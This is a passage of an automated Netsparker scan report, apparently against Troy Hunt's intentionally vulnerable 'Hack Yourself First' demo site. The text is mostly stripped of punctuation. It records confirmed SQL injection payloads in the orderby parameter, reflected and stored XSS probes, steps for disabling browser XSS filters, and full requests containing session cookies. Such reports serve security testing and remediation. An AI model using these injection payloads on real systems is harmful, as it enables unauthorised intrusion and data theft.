ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
23 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
12 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
24 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
13 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
25 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
14 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
